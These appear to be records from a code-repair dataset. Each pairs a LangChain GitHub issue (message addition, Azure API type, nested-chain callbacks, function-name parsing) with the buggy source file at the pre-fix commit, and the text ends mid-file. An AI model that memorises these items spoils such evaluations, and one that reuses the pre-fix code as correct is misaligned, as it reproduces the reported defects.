unsupported operand type(s) for +: 'SystemMessage' and 'HumanMessage'
### System Info

Langchain version: 0.0.247
python version: 3.11.0

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

You can reproduce this issue by following this link: https://python.langchain.com/docs/modules/model_io/prompts/prompt_templates/prompts_pipelining

```
from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
from langchain.schema import HumanMessage, AIMessage, SystemMessage

prompt = SystemMessage(content="You are a nice pirate")
new_prompt = (
    prompt + HumanMessage(content="hi") + AIMessage(content="what?") + "{input}"
)
```

`prompt + HumanMessage(content="hi")` raises this error.

### Expected behavior

The `+` operand should be supported for 'SystemMessage' and 'HumanMessage'.
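On this version, a workaround is to build the same prompt explicitly with `ChatPromptTemplate.from_messages`, which does not rely on message `__add__`. A minimal sketch, not taken from the issue; it assumes `from_messages` accepts bare message objects alongside templates, as it does in this era of the library:

```
from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
from langchain.schema import AIMessage, HumanMessage, SystemMessage

# Assemble the conversation without using `+` between messages.
new_prompt = ChatPromptTemplate.from_messages(
    [
        SystemMessage(content="You are a nice pirate"),
        HumanMessage(content="hi"),
        AIMessage(content="what?"),
        HumanMessagePromptTemplate.from_template("{input}"),
    ]
)

print(new_prompt.format_prompt(input="i said hi").to_messages())
```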
https://github.com/langchain-ai/langchain/issues/8472
https://github.com/langchain-ai/langchain/pull/8489
f31047a3941cd389a9b8c01446b097e3bfbb1235
1ec0b1837971bc58c54645c4ca515dc201788a82
"2023-07-30T02:14:01Z"
python
"2023-08-02T14:51:44Z"
libs/langchain/langchain/schema/messages.py
from __future__ import annotations

from abc import abstractmethod
from typing import Any, Dict, List, Sequence

from pydantic import Field

from langchain.load.serializable import Serializable


def get_buffer_string(
    messages: Sequence[BaseMessage], human_prefix: str = "Human", ai_prefix: str = "AI"
) -> str:
    """Convert sequence of Messages to strings and concatenate them into one string.

    Args:
        messages: Messages to be converted to strings.
        human_prefix: The prefix to prepend to contents of HumanMessages.
        ai_prefix: THe prefix to prepend to contents of AIMessages.

    Returns:
        A single string concatenation of all input messages.

    Example:
        .. code-block:: python

            from langchain.schema import AIMessage, HumanMessage

            messages = [
                HumanMessage(content="Hi, how are you?"),
                AIMessage(content="Good, how are you?"),
            ]
            get_buffer_string(messages)
            # -> "Human: Hi, how are you?\nAI: Good, how are you?"
    """
    string_messages = []
    for m in messages:
        if isinstance(m, HumanMessage):
            role = human_prefix
        elif isinstance(m, AIMessage):
            role = ai_prefix
        elif isinstance(m, SystemMessage):
            role = "System"
        elif isinstance(m, FunctionMessage):
            role = "Function"
        elif isinstance(m, ChatMessage):
            role = m.role
        else:
            raise ValueError(f"Got unsupported message type: {m}")
        message = f"{role}: {m.content}"
        if isinstance(m, AIMessage) and "function_call" in m.additional_kwargs:
            message += f"{m.additional_kwargs['function_call']}"
        string_messages.append(message)

    return "\n".join(string_messages)


class BaseMessage(Serializable):
    """The base abstract Message class.

    Messages are the inputs and outputs of ChatModels.
    """

    content: str
    """The string contents of the message."""

    additional_kwargs: dict = Field(default_factory=dict)
    """Any additional information."""

    @property
    @abstractmethod
    def type(self) -> str:
        """Type of the Message, used for serialization."""

    @property
    def lc_serializable(self) -> bool:
        """Whether this class is LangChain serializable."""
        return True


class BaseMessageChunk(BaseMessage):
    def _merge_kwargs_dict(
        self, left: Dict[str, Any], right: Dict[str, Any]
    ) -> Dict[str, Any]:
        """Merge additional_kwargs from another BaseMessageChunk into this one."""
        merged = left.copy()
        for k, v in right.items():
            if k not in merged:
                merged[k] = v
            elif type(merged[k]) != type(v):
                raise ValueError(
                    f'additional_kwargs["{k}"] already exists in this message,'
                    " but with a different type."
                )
            elif isinstance(merged[k], str):
                merged[k] += v
            elif isinstance(merged[k], dict):
                merged[k] = self._merge_kwargs_dict(merged[k], v)
            else:
                raise ValueError(
                    f"Additional kwargs key {k} already exists in this message."
                )
        return merged

    def __add__(self, other: Any) -> BaseMessageChunk:
        if isinstance(other, BaseMessageChunk):
            # If both are (subclasses of) BaseMessageChunk,
            # concat into a single BaseMessageChunk
            return self.__class__(
                content=self.content + other.content,
                additional_kwargs=self._merge_kwargs_dict(
                    self.additional_kwargs, other.additional_kwargs
                ),
            )
        else:
            raise TypeError(
                'unsupported operand type(s) for +: "'
                f"{self.__class__.__name__}"
                f'" and "{other.__class__.__name__}"'
            )


class HumanMessage(BaseMessage):
    """A Message from a human."""

    example: bool = False
    """Whether this Message is being passed in to the model as part of an example
        conversation.
    """

    @property
    def type(self) -> str:
        """Type of the message, used for serialization."""
        return "human"


class HumanMessageChunk(HumanMessage, BaseMessageChunk):
    pass


class AIMessage(BaseMessage):
    """A Message from an AI."""

    example: bool = False
    """Whether this Message is being passed in to the model as part of an example
        conversation.
    """

    @property
    def type(self) -> str:
        """Type of the message, used for serialization."""
        return "ai"


class AIMessageChunk(AIMessage, BaseMessageChunk):
    pass


class SystemMessage(BaseMessage):
    """A Message for priming AI behavior, usually passed in as the first of a sequence
    of input messages.
    """

    @property
    def type(self) -> str:
        """Type of the message, used for serialization."""
        return "system"


class SystemMessageChunk(SystemMessage, BaseMessageChunk):
    pass


class FunctionMessage(BaseMessage):
    """A Message for passing the result of executing a function back to a model."""

    name: str
    """The name of the function that was executed."""

    @property
    def type(self) -> str:
        """Type of the message, used for serialization."""
        return "function"


class FunctionMessageChunk(FunctionMessage, BaseMessageChunk):
    pass


class ChatMessage(BaseMessage):
    """A Message that can be assigned an arbitrary speaker (i.e. role)."""

    role: str
    """The speaker / role of the Message."""

    @property
    def type(self) -> str:
        """Type of the message, used for serialization."""
        return "chat"


class ChatMessageChunk(ChatMessage, BaseMessageChunk):
    pass


def _message_to_dict(message: BaseMessage) -> dict:
    return {"type": message.type, "data": message.dict()}


def messages_to_dict(messages: Sequence[BaseMessage]) -> List[dict]:
    """Convert a sequence of Messages to a list of dictionaries.

    Args:
        messages: Sequence of messages (as BaseMessages) to convert.

    Returns:
        List of messages as dicts.
    """
    return [_message_to_dict(m) for m in messages]


def _message_from_dict(message: dict) -> BaseMessage:
    _type = message["type"]
    if _type == "human":
        return HumanMessage(**message["data"])
    elif _type == "ai":
        return AIMessage(**message["data"])
    elif _type == "system":
        return SystemMessage(**message["data"])
    elif _type == "chat":
        return ChatMessage(**message["data"])
    elif _type == "function":
        return FunctionMessage(**message["data"])
    else:
        raise ValueError(f"Got unexpected message type: {_type}")


def messages_from_dict(messages: List[dict]) -> List[BaseMessage]:
    """Convert a sequence of messages from dicts to Message objects.

    Args:
        messages: Sequence of messages (as dicts) to convert.

    Returns:
        List of messages (BaseMessages).
    """
    return [_message_from_dict(m) for m in messages]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,650
[AzureChatOpenAI] openai_api_type can't be changed from the default 'azure' value
### System Info

Hello, during the development of an application that needs to authenticate to Azure services and use the wrapper [AzureChatOpenAI](https://github.com/hwchase17/langchain/blob/master/langchain/chat_models/azure_openai.py), we encountered an error because the model could not use the 'azure_ad' type. This class always sets openai_api_type to its default value of 'azure', even when an environment variable called 'OPENAI_API_TYPE' specifies 'azure_ad'. Why is that?

### Who can help?

@hwchase17 @agola11

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

    answering_llm = AzureChatOpenAI(
        deployment_name=ANSWERING_MODEL_CONFIG.model_name,
        model_name=ANSWERING_MODEL_CONFIG.model_type,  # "gpt-3.5-turbo"
        openai_api_type="azure_ad",  # IF THIS IS NOT EXPLICITLY PASSED IT FAILS
        openai_api_key=auth_token,
        temperature=ANSWERING_MODEL_CONFIG.temperature,
        max_tokens=ANSWERING_MODEL_CONFIG.max_tokens,
    )

### Expected behavior

We expect the wrapper to take the value of the environment variable correctly.
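A sketch of the setup the reporter is forced into on this version: passing `openai_api_type` explicitly while authenticating with an Azure AD token. The credential call is standard `azure-identity` usage rather than something from the issue, and the deployment name and endpoint below are hypothetical placeholders:

```
from azure.identity import DefaultAzureCredential

from langchain.chat_models import AzureChatOpenAI

# Fetch an AAD token for the Azure OpenAI resource (standard azure-identity usage).
token = DefaultAzureCredential().get_token(
    "https://cognitiveservices.azure.com/.default"
)

llm = AzureChatOpenAI(
    deployment_name="my-gpt35-deployment",  # hypothetical deployment name
    openai_api_type="azure_ad",  # must be passed explicitly on this version
    openai_api_key=token.token,
    openai_api_base="https://my-resource.openai.azure.com",  # hypothetical endpoint
    openai_api_version="2023-05-15",
)
```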
https://github.com/langchain-ai/langchain/issues/6650
https://github.com/langchain-ai/langchain/pull/8622
29f51055e8f7d060e6d3a5480591bef76652edae
e68a1d73d0c84503702a2bf66b52d7ae2336eb67
"2023-06-23T14:09:47Z"
python
"2023-08-04T03:21:41Z"
libs/langchain/langchain/chat_models/azure_openai.py
"""Azure OpenAI chat wrapper.""" from __future__ import annotations import logging from typing import Any, Dict, Mapping from pydantic import root_validator from langchain.chat_models.openai import ChatOpenAI from langchain.schema import ChatResult from langchain.utils import get_from_dict_or_env logger = logging.getLogger(__name__) class AzureChatOpenAI(ChatOpenAI): """Wrapper around Azure OpenAI Chat Completion API. To use this class you must have a deployed model on Azure OpenAI. Use `deployment_name` in the constructor to refer to the "Model deployment name" in the Azure portal. In addition, you should have the ``openai`` python package installed, and the following environment variables set or passed in constructor in lower case: - ``OPENAI_API_TYPE`` (default: ``azure``) - ``OPENAI_API_KEY`` - ``OPENAI_API_BASE`` - ``OPENAI_API_VERSION`` - ``OPENAI_PROXY`` For example, if you have `gpt-35-turbo` deployed, with the deployment name `35-turbo-dev`, the constructor should look like: .. code-block:: python AzureChatOpenAI( deployment_name="35-turbo-dev", openai_api_version="2023-05-15", ) Be aware the API version may change. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. """ deployment_name: str = "" openai_api_type: str = "azure" openai_api_base: str = "" openai_api_version: str = "" openai_api_key: str = "" openai_organization: str = "" openai_proxy: str = "" @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY", ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", ) values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) try: values["client"] = openai.ChatCompletion except AttributeError: raise ValueError( "`openai` has no `ChatCompletion` attribute, this is likely " "due to an old version of the openai package. Try upgrading it " "with `pip install --upgrade openai`." 
) if values["n"] < 1: raise ValueError("n must be at least 1.") if values["n"] > 1 and values["streaming"]: raise ValueError("n must be 1 when streaming.") return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" return { **super()._default_params, "engine": self.deployment_name, } @property def _identifying_params(self) -> Dict[str, Any]: """Get the identifying parameters.""" return {**self._default_params} @property def _client_params(self) -> Dict[str, Any]: """Get the config params used for the openai client.""" return { **super()._client_params, "api_type": self.openai_api_type, "api_version": self.openai_api_version, } @property def _llm_type(self) -> str: return "azure-openai-chat" def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult: for res in response["choices"]: if res.get("finish_reason", None) == "content_filter": raise ValueError( "Azure has not provided the response due to a content" " filter being triggered" ) return super()._create_chat_result(response)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,786
RetrievalQA.from_chain_type: callbacks are not called for all nested chains
### System Info langchain: 0.0.252 python: 3.10.12 @agola11 ### Who can help? @agola11 please take a look. ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create a callback handler LogHandler for on_chain_start and on_chat_model_start, and log run_id and parent_run_id in each of them 2. Create a retrieval chain and add this LogHandler 3. Add this LogHandler to the llm as well 4. When running the chain, one of the nested chains is not logged, because callbacks are not passed to that chain ### Expected behavior All the nested chains should have callbacks defined.
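A minimal sketch of the reproduction described above; `LogHandler` and the toy retriever are illustrative stand-ins, not code from the report:

```python
from langchain.callbacks.base import BaseCallbackHandler
from langchain.chains import RetrievalQA
from langchain.llms.fake import FakeListLLM
from langchain.schema import BaseRetriever, Document


class LogHandler(BaseCallbackHandler):
    """Print run ids so a gap in the run tree becomes visible."""

    def on_chain_start(self, serialized, inputs, *, run_id, parent_run_id=None, **kwargs):
        print("chain start:", run_id, "parent:", parent_run_id)

    def on_llm_start(self, serialized, prompts, *, run_id, parent_run_id=None, **kwargs):
        print("llm start:", run_id, "parent:", parent_run_id)


class OneDocRetriever(BaseRetriever):
    """Toy retriever so the example runs without a vector store."""

    def _get_relevant_documents(self, query, *, run_manager):
        return [Document(page_content="callbacks flow through run managers")]

    async def _aget_relevant_documents(self, query, *, run_manager):
        return [Document(page_content="callbacks flow through run managers")]


llm = FakeListLLM(responses=["an answer"])
chain = RetrievalQA.from_chain_type(
    llm, retriever=OneDocRetriever(), callbacks=[LogHandler()]
)
chain.run("test question")  # one nested chain emits no events for this handler
```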
https://github.com/langchain-ai/langchain/issues/8786
https://github.com/langchain-ai/langchain/pull/8787
5f1aab548731b53ebab00dd745a35ec7da52bf1c
797c9e92c82f8e843b321ec2167bb1678ced03cf
"2023-08-05T06:43:10Z"
python
"2023-08-06T22:11:45Z"
libs/langchain/langchain/chains/question_answering/__init__.py
"""Load question answering chains.""" from typing import Any, Mapping, Optional, Protocol from langchain.callbacks.base import BaseCallbackManager from langchain.callbacks.manager import Callbacks from langchain.chains import ReduceDocumentsChain from langchain.chains.combine_documents.base import BaseCombineDocumentsChain from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain from langchain.chains.combine_documents.map_rerank import MapRerankDocumentsChain from langchain.chains.combine_documents.refine import RefineDocumentsChain from langchain.chains.combine_documents.stuff import StuffDocumentsChain from langchain.chains.llm import LLMChain from langchain.chains.question_answering import ( map_reduce_prompt, refine_prompts, stuff_prompt, ) from langchain.chains.question_answering.map_rerank_prompt import ( PROMPT as MAP_RERANK_PROMPT, ) from langchain.schema.language_model import BaseLanguageModel from langchain.schema.prompt_template import BasePromptTemplate class LoadingCallable(Protocol): """Interface for loading the combine documents chain.""" def __call__( self, llm: BaseLanguageModel, **kwargs: Any ) -> BaseCombineDocumentsChain: """Callable to load the combine documents chain.""" def _load_map_rerank_chain( llm: BaseLanguageModel, prompt: BasePromptTemplate = MAP_RERANK_PROMPT, verbose: bool = False, document_variable_name: str = "context", rank_key: str = "score", answer_key: str = "answer", callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> MapRerankDocumentsChain: llm_chain = LLMChain( llm=llm, prompt=prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) return MapRerankDocumentsChain( llm_chain=llm_chain, rank_key=rank_key, answer_key=answer_key, document_variable_name=document_variable_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def _load_stuff_chain( llm: BaseLanguageModel, prompt: Optional[BasePromptTemplate] = None, document_variable_name: str = "context", verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> StuffDocumentsChain: _prompt = prompt or stuff_prompt.PROMPT_SELECTOR.get_prompt(llm) llm_chain = LLMChain( llm=llm, prompt=_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) # TODO: document prompt return StuffDocumentsChain( llm_chain=llm_chain, document_variable_name=document_variable_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def _load_map_reduce_chain( llm: BaseLanguageModel, question_prompt: Optional[BasePromptTemplate] = None, combine_prompt: Optional[BasePromptTemplate] = None, combine_document_variable_name: str = "summaries", map_reduce_document_variable_name: str = "context", collapse_prompt: Optional[BasePromptTemplate] = None, reduce_llm: Optional[BaseLanguageModel] = None, collapse_llm: Optional[BaseLanguageModel] = None, verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, token_max: int = 3000, **kwargs: Any, ) -> MapReduceDocumentsChain: _question_prompt = ( question_prompt or map_reduce_prompt.QUESTION_PROMPT_SELECTOR.get_prompt(llm) ) _combine_prompt = ( combine_prompt or map_reduce_prompt.COMBINE_PROMPT_SELECTOR.get_prompt(llm) ) map_chain = LLMChain( llm=llm, prompt=_question_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) _reduce_llm = reduce_llm or llm reduce_chain = 
LLMChain( llm=_reduce_llm, prompt=_combine_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) # TODO: document prompt combine_documents_chain = StuffDocumentsChain( llm_chain=reduce_chain, document_variable_name=combine_document_variable_name, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) if collapse_prompt is None: collapse_chain = None if collapse_llm is not None: raise ValueError( "collapse_llm provided, but collapse_prompt was not: please " "provide one or stop providing collapse_llm." ) else: _collapse_llm = collapse_llm or llm collapse_chain = StuffDocumentsChain( llm_chain=LLMChain( llm=_collapse_llm, prompt=collapse_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ), document_variable_name=combine_document_variable_name, verbose=verbose, callback_manager=callback_manager, ) reduce_documents_chain = ReduceDocumentsChain( combine_documents_chain=combine_documents_chain, collapse_documents_chain=collapse_chain, token_max=token_max, verbose=verbose, ) return MapReduceDocumentsChain( llm_chain=map_chain, document_variable_name=map_reduce_document_variable_name, reduce_documents_chain=reduce_documents_chain, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, **kwargs, ) def _load_refine_chain( llm: BaseLanguageModel, question_prompt: Optional[BasePromptTemplate] = None, refine_prompt: Optional[BasePromptTemplate] = None, document_variable_name: str = "context_str", initial_response_name: str = "existing_answer", refine_llm: Optional[BaseLanguageModel] = None, verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> RefineDocumentsChain: _question_prompt = ( question_prompt or refine_prompts.QUESTION_PROMPT_SELECTOR.get_prompt(llm) ) _refine_prompt = refine_prompt or refine_prompts.REFINE_PROMPT_SELECTOR.get_prompt( llm ) initial_chain = LLMChain( llm=llm, prompt=_question_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) _refine_llm = refine_llm or llm refine_chain = LLMChain( llm=_refine_llm, prompt=_refine_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) return RefineDocumentsChain( initial_llm_chain=initial_chain, refine_llm_chain=refine_chain, document_variable_name=document_variable_name, initial_response_name=initial_response_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def load_qa_chain( llm: BaseLanguageModel, chain_type: str = "stuff", verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, **kwargs: Any, ) -> BaseCombineDocumentsChain: """Load question answering chain. Args: llm: Language Model to use in the chain. chain_type: Type of document combining chain to use. Should be one of "stuff", "map_reduce", "map_rerank", and "refine". verbose: Whether chains should be run in verbose mode or not. Note that this applies to all chains that make up the final chain. callback_manager: Callback manager to use for the chain. Returns: A chain to use for question answering. """ loader_mapping: Mapping[str, LoadingCallable] = { "stuff": _load_stuff_chain, "map_reduce": _load_map_reduce_chain, "refine": _load_refine_chain, "map_rerank": _load_map_rerank_chain, } if chain_type not in loader_mapping: raise ValueError( f"Got unsupported chain type: {chain_type}. 
" f"Should be one of {loader_mapping.keys()}" ) return loader_mapping[chain_type]( llm, verbose=verbose, callback_manager=callback_manager, **kwargs )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,616
_get_python_function_name does not work with classes
### System Info LangChain : v0.0.231 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction # Issue `convert_to_openai_function` does not work as intended: - Classes are not supported - Any function without its source is not supported # Reproduce ```python from dataclasses import dataclass from langchain.chains.openai_functions.base import ( convert_to_openai_function, ) @dataclass class System: name: str ram: int convert_to_openai_function(System) ``` ### Expected behavior When calling `langchain.chains.openai_functions.base.convert_to_openai_function`, the subsequent call to `_get_python_function_name` fails because it tries to read source code (and cannot find it). Something much simpler would be to access the `__name__` attribute of the callable.
https://github.com/langchain-ai/langchain/issues/7616
https://github.com/langchain-ai/langchain/pull/7617
797c9e92c82f8e843b321ec2167bb1678ced03cf
4a7ebb7184fa5dad4cdfef49d1eab2a3e9029a2b
"2023-07-12T21:03:09Z"
python
"2023-08-06T22:12:03Z"
libs/langchain/langchain/chains/openai_functions/base.py
"""Methods for creating chains that use OpenAI function-calling APIs.""" import inspect import re from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Type, Union from pydantic import BaseModel from langchain.base_language import BaseLanguageModel from langchain.chains import LLMChain from langchain.output_parsers.openai_functions import ( JsonOutputFunctionsParser, PydanticAttrOutputFunctionsParser, PydanticOutputFunctionsParser, ) from langchain.prompts import BasePromptTemplate from langchain.schema import BaseLLMOutputParser PYTHON_TO_JSON_TYPES = { "str": "string", "int": "number", "float": "number", "bool": "boolean", } def _get_python_function_name(function: Callable) -> str: """Get the name of a Python function.""" source = inspect.getsource(function) return re.search(r"^def (.*)\(", source).groups()[0] # type: ignore def _parse_python_function_docstring(function: Callable) -> Tuple[str, dict]: """Parse the function and argument descriptions from the docstring of a function. Assumes the function docstring follows Google Python style guide. """ docstring = inspect.getdoc(function) if docstring: docstring_blocks = docstring.split("\n\n") descriptors = [] args_block = None past_descriptors = False for block in docstring_blocks: if block.startswith("Args:"): args_block = block break elif block.startswith("Returns:") or block.startswith("Example:"): # Don't break in case Args come after past_descriptors = True elif not past_descriptors: descriptors.append(block) else: continue description = " ".join(descriptors) else: description = "" args_block = None arg_descriptions = {} if args_block: arg = None for line in args_block.split("\n")[1:]: if ":" in line: arg, desc = line.split(":") arg_descriptions[arg.strip()] = desc.strip() elif arg: arg_descriptions[arg.strip()] += " " + line.strip() return description, arg_descriptions def _get_python_function_arguments(function: Callable, arg_descriptions: dict) -> dict: """Get JsonSchema describing a Python functions arguments. Assumes all function arguments are of primitive types (int, float, str, bool) or are subclasses of pydantic.BaseModel. """ properties = {} annotations = inspect.getfullargspec(function).annotations for arg, arg_type in annotations.items(): if arg == "return": continue if isinstance(arg_type, type) and issubclass(arg_type, BaseModel): properties[arg] = arg_type.schema() elif arg_type.__name__ in PYTHON_TO_JSON_TYPES: properties[arg] = {"type": PYTHON_TO_JSON_TYPES[arg_type.__name__]} if arg in arg_descriptions: if arg not in properties: properties[arg] = {} properties[arg]["description"] = arg_descriptions[arg] return properties def _get_python_function_required_args(function: Callable) -> List[str]: """Get the required arguments for a Python function.""" spec = inspect.getfullargspec(function) required = spec.args[: -len(spec.defaults)] if spec.defaults else spec.args required += [k for k in spec.kwonlyargs if k not in (spec.kwonlydefaults or {})] return required def convert_python_function_to_openai_function(function: Callable) -> Dict[str, Any]: """Convert a Python function to an OpenAI function-calling API compatible dict. Assumes the Python function has type hints and a docstring with a description. If the docstring has Google Python style argument descriptions, these will be included as well. 
""" description, arg_descriptions = _parse_python_function_docstring(function) return { "name": _get_python_function_name(function), "description": description, "parameters": { "type": "object", "properties": _get_python_function_arguments(function, arg_descriptions), "required": _get_python_function_required_args(function), }, } def convert_to_openai_function( function: Union[Dict[str, Any], Type[BaseModel], Callable] ) -> Dict[str, Any]: """Convert a raw function/class to an OpenAI function. Args: function: Either a dictionary, a pydantic.BaseModel class, or a Python function. If a dictionary is passed in, it is assumed to already be a valid OpenAI function. Returns: A dict version of the passed in function which is compatible with the OpenAI function-calling API. """ if isinstance(function, dict): return function elif isinstance(function, type) and issubclass(function, BaseModel): schema = function.schema() return { "name": schema["title"], "description": schema["description"], "parameters": schema, } elif callable(function): return convert_python_function_to_openai_function(function) else: raise ValueError( f"Unsupported function type {type(function)}. Functions must be passed in" f" as Dict, pydantic.BaseModel, or Callable." ) def _get_openai_output_parser( functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]], function_names: Sequence[str], ) -> BaseLLMOutputParser: """Get the appropriate function output parser given the user functions.""" if isinstance(functions[0], type) and issubclass(functions[0], BaseModel): if len(functions) > 1: pydantic_schema: Union[Dict, Type[BaseModel]] = { name: fn for name, fn in zip(function_names, functions) } else: pydantic_schema = functions[0] output_parser: BaseLLMOutputParser = PydanticOutputFunctionsParser( pydantic_schema=pydantic_schema ) else: output_parser = JsonOutputFunctionsParser(args_only=len(functions) <= 1) return output_parser def create_openai_fn_chain( functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]], llm: BaseLanguageModel, prompt: BasePromptTemplate, *, output_parser: Optional[BaseLLMOutputParser] = None, **kwargs: Any, ) -> LLMChain: """Create an LLM chain that uses OpenAI functions. Args: functions: A sequence of either dictionaries, pydantic.BaseModels classes, or Python functions. If dictionaries are passed in, they are assumed to already be a valid OpenAI functions. If only a single function is passed in, then it will be enforced that the model use that function. pydantic.BaseModels and Python functions should have docstrings describing what the function does. For best results, pydantic.BaseModels should have descriptions of the parameters and Python functions should have Google Python style args descriptions in the docstring. Additionally, Python functions should only use primitive types (str, int, float, bool) or pydantic.BaseModels for arguments. llm: Language model to use, assumed to support the OpenAI function-calling API. prompt: BasePromptTemplate to pass to the model. output_parser: BaseLLMOutputParser to use for parsing model outputs. By default will be inferred from the function types. If pydantic.BaseModels are passed in, then the OutputParser will try to parse outputs using those. Otherwise model outputs will simply be parsed as JSON. If multiple functions are passed in and they are not pydantic.BaseModels, the chain output will include both the name of the function that was returned and the arguments to pass to the function. 
Returns: An LLMChain that will pass in the given functions to the model when run. Example: .. code-block:: python from langchain.chains.openai_functions import create_openai_fn_chain from langchain.chat_models import ChatOpenAI from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate from pydantic import BaseModel, Field class RecordPerson(BaseModel): \"\"\"Record some identifying information about a person.\"\"\" name: str = Field(..., description="The person's name") age: int = Field(..., description="The person's age") fav_food: Optional[str] = Field(None, description="The person's favorite food") class RecordDog(BaseModel): \"\"\"Record some identifying information about a dog.\"\"\" name: str = Field(..., description="The dog's name") color: str = Field(..., description="The dog's color") fav_food: Optional[str] = Field(None, description="The dog's favorite food") llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0) prompt_msgs = [ SystemMessage( content="You are a world class algorithm for recording entities" ), HumanMessage(content="Make calls to the relevant function to record the entities in the following input:"), HumanMessagePromptTemplate.from_template("{input}"), HumanMessage(content="Tips: Make sure to answer in the correct format"), ] prompt = ChatPromptTemplate(messages=prompt_msgs) chain = create_openai_fn_chain([RecordPerson, RecordDog]) chain.run("Harry was a chubby brown beagle who loved chicken") # -> RecordDog(name="Harry", color="brown", fav_food="chicken") """ # noqa: E501 if not functions: raise ValueError("Need to pass in at least one function. Received zero.") openai_functions = [convert_to_openai_function(f) for f in functions] fn_names = [oai_fn["name"] for oai_fn in openai_functions] output_parser = output_parser or _get_openai_output_parser(functions, fn_names) llm_kwargs: Dict[str, Any] = { "functions": openai_functions, } if len(openai_functions) == 1: llm_kwargs["function_call"] = {"name": openai_functions[0]["name"]} llm_chain = LLMChain( llm=llm, prompt=prompt, output_parser=output_parser, llm_kwargs=llm_kwargs, output_key="function", **kwargs, ) return llm_chain def create_structured_output_chain( output_schema: Union[Dict[str, Any], Type[BaseModel]], llm: BaseLanguageModel, prompt: BasePromptTemplate, *, output_parser: Optional[BaseLLMOutputParser] = None, **kwargs: Any, ) -> LLMChain: """Create an LLMChain that uses an OpenAI function to get a structured output. Args: output_schema: Either a dictionary or pydantic.BaseModel class. If a dictionary is passed in, it's assumed to already be a valid JsonSchema. For best results, pydantic.BaseModels should have docstrings describing what the schema represents and descriptions for the parameters. llm: Language model to use, assumed to support the OpenAI function-calling API. prompt: BasePromptTemplate to pass to the model. output_parser: BaseLLMOutputParser to use for parsing model outputs. By default will be inferred from the function types. If pydantic.BaseModels are passed in, then the OutputParser will try to parse outputs using those. Otherwise model outputs will simply be parsed as JSON. Returns: An LLMChain that will pass the given function to the model. Example: .. 
